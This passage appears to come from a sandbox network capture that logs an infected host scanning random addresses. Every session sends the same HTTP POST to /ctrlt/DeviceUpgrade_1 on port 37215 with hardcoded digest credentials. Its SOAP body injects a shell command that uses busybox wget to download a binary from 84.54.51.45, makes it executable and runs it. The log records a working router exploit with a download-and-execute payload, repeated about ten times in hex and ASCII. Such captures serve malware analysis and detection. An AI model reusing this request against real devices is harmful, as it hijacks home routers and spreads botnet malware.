                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1669192.168.2.1558514197.229.86.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461591005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1670192.168.2.1538276197.195.164.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461591959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1671192.168.2.1545376197.158.168.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461594105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1672192.168.2.1536402197.7.5.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461637974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1673192.168.2.1559390197.81.61.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461656094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1674192.168.2.1546214197.20.52.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461708069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1675192.168.2.1554192197.69.110.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461724997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1676192.168.2.1533944197.177.69.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461724997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1677192.168.2.1539288197.213.22.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461740971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1678192.168.2.1557532197.49.174.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461741924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
